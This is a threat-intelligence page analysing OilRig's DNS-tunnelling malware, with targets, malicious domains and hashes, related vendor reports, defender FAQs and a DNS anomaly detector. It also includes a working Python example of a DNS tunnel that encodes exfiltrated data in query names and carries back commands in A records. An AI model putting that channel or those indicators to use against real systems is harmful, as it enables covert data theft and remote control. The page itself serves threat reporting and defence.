Threats Feed | OilRig | Last Updated: 28/01/2026 | Author: Certfa Radar | Publish Date: 16/04/2019

Analyzing OilRig's Use of DNS Tunneling in Cyber Espionage Campaigns

  • Actor Motivations: Espionage, Exfiltration
  • Attack Vectors: Malware, Trojan
  • Attack Complexity: Medium
  • Threat Risk: High Impact / High Probability

Threat Overview

The report highlights OilRig's deployment of tools such as Helminth, ISMAgent, ALMA Communicator, BONDUPDATER, and QUADAGENT, all of which use DNS queries to communicate covertly with their C2 servers. The group favours this channel because outbound DNS is almost universally permitted through firewalls and other security devices and is rarely inspected with the same rigour as HTTP traffic. Its DNS tunneling protocols have evolved over time: each tool generation uses its own subdomain structure and encoding scheme to carry data out in queries and receive instructions back in responses, which makes the traffic harder to distinguish from ordinary lookups and defeats signatures written for earlier variants.
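The mechanism the overview describes, shown as an added example rather than code from the report or from any OilRig tool: the client encodes data into subdomain labels under an attacker-controlled domain, the authoritative server for that domain decodes the labels, and the instruction travels back packed into the A record it answers with. The domain ntp.example.net, the label layout <seq>.<session>.<data labels>.<domain>, the base32 encoding, and the opcode values are assumptions made for illustration; the real tools use their own formats, documented in the vendor reports listed under Overlaps.

```python
"""Toy DNS tunnel: data rides in query labels, instructions in A records.
Added illustration of the generic technique only; NOT OilRig's protocol.
Domain, label layout, encoding and opcodes are assumptions for the example."""
import base64
import ipaddress
from collections import defaultdict

MAX_LABEL = 63             # RFC 1035: a label is at most 63 octets
MAX_NAME = 253             # practical limit for a full name in text form
DATA_LABELS_PER_QUERY = 2  # assumed: up to 126 encoded characters per query

# Assumed instruction set carried back in the A record (opcode in first octet).
OPCODES = {"ack": 1, "sleep": 2, "run": 3}


def _b32(data: bytes) -> str:
    """Lower-case base32 without padding: only [a-z2-7], valid in a DNS label."""
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_queries(payload: bytes, session: str, domain: str) -> list[str]:
    """Client side: split payload into names <seq>.<session>.<data...>.<domain>."""
    encoded = _b32(payload)
    per_query = MAX_LABEL * DATA_LABELS_PER_QUERY
    names = []
    for seq, start in enumerate(range(0, len(encoded), per_query)):
        chunk = encoded[start:start + per_query]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        name = ".".join([str(seq), session, *labels, domain])
        if len(name) > MAX_NAME:
            raise ValueError(f"name too long ({len(name)} chars): shorten domain or session")
        names.append(name)
    return names


def decode_queries(names, domain: str) -> dict[str, bytes]:
    """Server side (authoritative NS for `domain`): reassemble payload per session.
    Tolerates out-of-order arrival and resolver retries (duplicate seq)."""
    suffix = "." + domain
    chunks_by_session: dict[str, dict[int, str]] = defaultdict(dict)
    for name in names:
        if not name.endswith(suffix):
            continue                      # unrelated query, ignore
        labels = name[:-len(suffix)].split(".")
        if len(labels) < 3 or not labels[0].isdigit():
            continue                      # not in our layout
        seq, session, data = int(labels[0]), labels[1], "".join(labels[2:])
        chunks_by_session[session][seq] = data
    out = {}
    for session, chunks in chunks_by_session.items():
        if sorted(chunks) != list(range(len(chunks))):
            raise ValueError(f"session {session}: missing chunk(s)")
        out[session] = _unb32("".join(chunks[i] for i in range(len(chunks))))
    return out


def encode_answer(opcode: str, arg: int) -> str:
    """Server side: pack opcode (8 bits) and argument (24 bits) into the IPv4
    address returned as the A record for the query."""
    if not 0 <= arg < 1 << 24:
        raise ValueError("argument must fit in 24 bits")
    return str(ipaddress.IPv4Address((OPCODES[opcode] << 24) | arg))


def decode_answer(address: str) -> tuple[str, int]:
    """Client side: recover (opcode, argument) from the resolved address."""
    value = int(ipaddress.IPv4Address(address))
    code, arg = value >> 24, value & 0xFFFFFF
    for name, known in OPCODES.items():
        if known == code:
            return name, arg
    raise ValueError(f"unknown opcode {code}")


def demo() -> dict:
    domain, session = "ntp.example.net", "a1b2c3d4"   # assumed values
    payload = b"host=WS01;user=alice;os=Win10"         # constructed beacon data
    queries = encode_queries(payload, session, domain)
    # The recursive resolver may deliver the queries in arbitrary order.
    received = decode_queries(reversed(queries), domain)
    answer = encode_answer("sleep", 600)               # encodes as 2.0.2.88
    return {"queries": queries, "received": received[session],
            "answer": answer, "instruction": decode_answer(answer)}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two properties of this layout are what a defender can key on: every query carries a never-before-seen name (a cache miss that must reach the attacker's authoritative server), and the data labels are long and high-entropy compared with ordinary hostnames.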

Detected Targets

Type     Description                         Confidence
Sector   Government Agencies and Services    Verified
Region   Saudi Arabia                        Verified
Region   Middle East Countries               Verified

Extracted IOCs

  • acrobatverify[.]com
  • go0gie[.]com
  • ntpupdateserver[.]com
  • poison-frog[.]club
  • prosalar[.]com
  • withyourface[.]com
  • 089bf971e8839db818ac462f53f82daed523c413bfc2e01fb76dd70b37162afe
  • 0ec288ac8c4aa045a45526c2939dbd843391c9c75fa4a3bcc0a6d7dc692fdcd1
  • 1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1
  • 1f6369b42a76d02f32558912b57ede4f5ff0a90b18d3b96a4fe24120fa2c300c
  • 3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4
  • 4b5112f0fb64825b879b01d686e8f4d43521252a3b4f4026c9d1d76d3f15b281
  • 52366b9ab2eb1d77ca6719a40f4779eb302dca97a832bd447abf10512dc51ed9
  • 662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f
  • 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00
  • a9f1375da973b229eb649dc3c07484ae7513032b79665efe78c0e55a6e716821
  • d5c1822a36f2e7107d0d4c005c26978d00bcb34a587bd9ccf11ae7761ec73fb7
  • d808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34
  • de620a0511d14a2fbc9b225ebfda550973d956ab4dec7e460a42e9d2d3cf0588
  • e52b8b0e8225befec156b355b3022faf5617542b82aa54f9f42088aa05a4ec49
  • f37b1bbf5a07759f10e0298b861b354cee13f325bc76fbddfaacd1ea7505e111
  • f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e

Tip: 22 related IOCs (0 IP, 6 domain, 0 URL, 0 email, 16 file hash) to this threat have been found.

Overlaps

[OilRig] OilRig's Cyber Tactics: Targeting Middle East Sectors with Stealthy Attacks

Source: Picus Security - December 2024

Detection (one case): 1f6369b42a76d02f32558912b57ede4f5ff0a90b18d3b96a4fe24120fa2c300c

[OilRig] OilRig's Poison Frog: From PowerShell Backdoors to Cisco AnyConnect Disguises

Source: Kaspersky - December 2019

Detection (one case): poison-frog[.]club

[Greenbug] Decoding Greenbug Group's Command and Control Communications via DNS Tunneling

Source: DomainTools - December 2019

Detection (one case): ntpupdateserver[.]com

[OilRig] OilRig's Use of BONDUPDATER: A Stealthy Cyber Espionage Campaign on Bahrain

Source: Netscout - September 2019

Detection (one case): withyourface[.]com

[OilRig] Uncovering OilRig's Malware Testing Ops for Targeted Attacks in the Middle East

Source: Palo Alto Networks - November 2018

Detection (two cases): 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00, withyourface[.]com

[OilRig] OilRig Continues Assault on Middle Eastern Governments and Businesses with BONDUPDATER

Source: Palo Alto Networks - September 2018

Detection (three cases): 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00, d5c1822a36f2e7107d0d4c005c26978d00bcb34a587bd9ccf11ae7761ec73fb7, withyourface[.]com

[OilRig] Adapting and Evolving: A Look at OilRig's QUADAGENT-Driven Attacks

Source: Palo Alto Networks - July 2018

Detection (two cases): 1f6369b42a76d02f32558912b57ede4f5ff0a90b18d3b96a4fe24120fa2c300c, acrobatverify[.]com

[APT34] APT34's Enhanced Cyber Espionage: BONDUPDATER and POWRUNER Malware Variants Unveiled

Source: Booz Allen - February 2018

Detection (one case): poison-frog[.]club

[OilRig] OilRig Threat Group Introduces ALMA Communicator in Spear-Phishing Attacks

Source: Palo Alto Networks - November 2017

Detection (two cases): f37b1bbf5a07759f10e0298b861b354cee13f325bc76fbddfaacd1ea7505e111, prosalar[.]com

[Greenbug] Potential Cyber Targets Revealed in Greenbug's Domain Registrations: Israeli and Saudi Firms in Focus

Source: ClearSky - October 2017

Detection (one case): ntpupdateserver[.]com

[OilRig] Inside OilRig's Attack on UAE Government: ISMInjector and CVE-2017-0199 Exploit in Play

Source: Palo Alto Networks - October 2017

Detection (two cases): a9f1375da973b229eb649dc3c07484ae7513032b79665efe78c0e55a6e716821, ntpupdateserver[.]com

[OilRig] OilRig and Greenbug Connection: Expanding Threats with Modified Trojans

Source: Palo Alto Networks - July 2017

Detection (two cases): 52366b9ab2eb1d77ca6719a40f4779eb302dca97a832bd447abf10512dc51ed9, ntpupdateserver[.]com

[OilRig] OilRig Campaign: Malware Updates and Expanded Global Targets

Source: Palo Alto Networks - October 2016

Detection (nine cases): 089bf971e8839db818ac462f53f82daed523c413bfc2e01fb76dd70b37162afe, 0ec288ac8c4aa045a45526c2939dbd843391c9c75fa4a3bcc0a6d7dc692fdcd1, 1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1, 3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4, 4b5112f0fb64825b879b01d686e8f4d43521252a3b4f4026c9d1d76d3f15b281, 662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f, d808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34, f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e, go0gie[.]com

[OilRig] OilRig Group Unleashes Coordinated Cyber Campaigns on Saudi Arabian Industries

Source: Palo Alto Networks - May 2016

Detection (one case): go0gie[.]com

[APT34] APT34 Targets Middle Eastern Banks with Macro Malware

Source: Mandiant - May 2016

Detection (one case): go0gie[.]com

Hint: Overlaps are extracted automatically by examining the IOCs associated with all indexed threats and actors.

FAQs

Understanding OilRig’s DNS Tunneling Operations

The threat group known as OilRig has been using custom-built malware that relies on DNS tunneling to communicate covertly with the group's C2 servers, allowing it to control infected systems and exfiltrate data.

The attacks were conducted by OilRig, a group active since at least 2016, known for targeting organizations primarily in the Middle East.

The goal was to maintain covert access to compromised systems, exfiltrate sensitive data, and deliver follow-on payloads through persistent DNS-based channels.

The operations are targeted rather than opportunistic, and OilRig has repeatedly updated its tools and techniques, which indicates sustained campaigns against multiple organizations over several years.

The documented campaigns included attacks on government entities, technology providers, and organizations in the Middle East.

The malware sends specially crafted DNS queries to actor-controlled domains, embedding encoded data in the subdomain labels of those queries, and interprets the DNS responses it receives as instructions or as additional payload to execute.

DNS is often overlooked in security monitoring and is permitted outbound through firewalls, so it offers an effective way to bypass traditional network controls and keep a low-profile command channel open even when other egress is blocked.

Monitor DNS traffic for anomalies such as unusually long or high-entropy subdomains, large numbers of unique names queried under a single domain, and unexpected record types; block or sinkhole known malicious domains such as those listed above; keep endpoint defenses updated; and train employees to recognize phishing, the delivery method noted in several of the overlapping reports.
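The first of those measures, DNS anomaly monitoring, as an added example that is not from the report: a small heuristic detector that profiles a DNS query log per registered domain and flags domains whose subdomains behave like a data channel (many distinct subdomains, long labels, high character entropy). The log format, the sample lines and the thresholds are constructed for this example; the tunnel-like lines imitate the kind of traffic described in the FAQ and are not real OilRig indicators.

```python
"""Heuristic DNS tunnelling detector over a query log. Added example, not
from the report; log format, sample lines and thresholds are constructed."""
import math
from collections import Counter, defaultdict

# Constructed sample log, one query per line: "<timestamp> <client> <qtype> <qname>".
# The first block is ordinary traffic; the second imitates a tunnel: a new,
# long, high-entropy subdomain on every query to one registered domain.
SAMPLE_LOG = """\
2019-04-16T09:00:01Z 10.0.0.5 A www.example.com
2019-04-16T09:00:02Z 10.0.0.5 A mail.example.com
2019-04-16T09:00:03Z 10.0.0.6 A cdn.example.com
2019-04-16T09:00:04Z 10.0.0.6 A api.example.com
2019-04-16T09:00:05Z 10.0.0.5 A www.example.com
2019-04-16T09:00:06Z 10.0.0.7 A mail.example.com
2019-04-16T09:00:07Z 10.0.0.7 A www.example.org
2019-04-16T09:00:08Z 10.0.0.7 A static.example.org
2019-04-16T09:05:00Z 10.0.0.7 A 0.a1b2c3d4.nbxxe43fpb2gkpkxnzqw2zj5mfzgk3tnfu5gk2ls.ntp.example.net
2019-04-16T09:05:01Z 10.0.0.7 A 1.a1b2c3d4.krugkidrovuwg2zamjzgkidhmfzw4ylqnzxw4.ntp.example.net
2019-04-16T09:05:02Z 10.0.0.7 A 2.a1b2c3d4.onswy3dfnrrxe3dvmvzxg3lbmzuwy4lsnvsw.ntp.example.net
2019-04-16T09:05:03Z 10.0.0.7 A 3.a1b2c3d4.gezdgnbvgy3tqojqge2dinzwgq4dsmrrgizde.ntp.example.net
2019-04-16T09:05:04Z 10.0.0.7 A 4.a1b2c3d4.mfrgg2lemjvwm3dtpfzw633snfxgsiljmfrgg.ntp.example.net
2019-04-16T09:05:05Z 10.0.0.7 TXT 5.a1b2c3d4.nrxw4zlsfzxgk5dxn5zgwllffzrw63lunfxge.ntp.example.net
"""


def shannon_entropy(text: str) -> float:
    """Bits per character: ~0 for 'www', 4 to 5 for base32/hex-encoded data."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def split_name(qname: str) -> tuple[str, str]:
    """Return (registered domain, subdomain). Approximation: the last two
    labels are the registered domain. Production code should consult the
    Public Suffix List so suffixes such as gov.sa or co.uk are handled."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def parse_log(text: str) -> list[tuple[str, str, str, str]]:
    """Parse the constructed 4-field format; skip malformed lines."""
    return [tuple(p) for p in (line.split() for line in text.splitlines()) if len(p) == 4]


def profile(records) -> dict:
    """Per registered domain: query count, distinct subdomains, clients, record
    types, and per-query subdomain length and entropy (dots removed)."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(), "clients": set(),
                                 "qtypes": Counter(), "lengths": [], "entropies": []})
    for _ts, client, qtype, qname in records:
        reg, sub = split_name(qname)
        s = stats[reg]
        s["queries"] += 1
        s["clients"].add(client)
        s["qtypes"][qtype] += 1
        if sub:
            s["subdomains"].add(sub)
            s["lengths"].append(len(sub))
            s["entropies"].append(shannon_entropy(sub.replace(".", "")))
    return stats


def detect(log_text: str, min_unique: int = 5, min_mean_len: float = 20.0,
           min_mean_entropy: float = 3.0) -> list[dict]:
    """Flag registered domains that look like tunnel endpoints. Thresholds are
    deliberately low to fit the tiny sample; baseline them on real traffic."""
    findings = []
    for reg, s in profile(parse_log(log_text)).items():
        unique = len(s["subdomains"])
        if unique < min_unique:
            continue
        mean_len = sum(s["lengths"]) / len(s["lengths"])
        mean_ent = sum(s["entropies"]) / len(s["entropies"])
        if mean_len >= min_mean_len and mean_ent >= min_mean_entropy:
            findings.append({
                "domain": reg,
                "queries": s["queries"],
                "unique_subdomains": unique,
                "unique_ratio": round(unique / s["queries"], 2),  # near 1.0 for tunnels
                "mean_subdomain_len": round(mean_len, 1),
                "mean_entropy": round(mean_ent, 2),
                "clients": sorted(s["clients"]),
                "qtypes": dict(s["qtypes"]),
            })
    return sorted(findings, key=lambda f: -f["unique_subdomains"])


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

In a real deployment the unique-subdomain threshold is hundreds or thousands of names per domain per hour, measured against a baseline, and you need an allowlist for legitimate high-entropy DNS users (CDNs, anti-virus reputation lookups, some telemetry agents). Complement this with the per-client view (which hosts query the flagged domain, and how often), the share of TXT and NULL queries, and the NXDOMAIN rate, since tunnels that use responses as a downlink often produce answers that ordinary clients never see.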

This is primarily a targeted threat aimed at specific organizations, but the DNS tunneling techniques themselves are generic and could be adopted by other actors against a broader set of victims if DNS traffic is left unmonitored and unrestricted.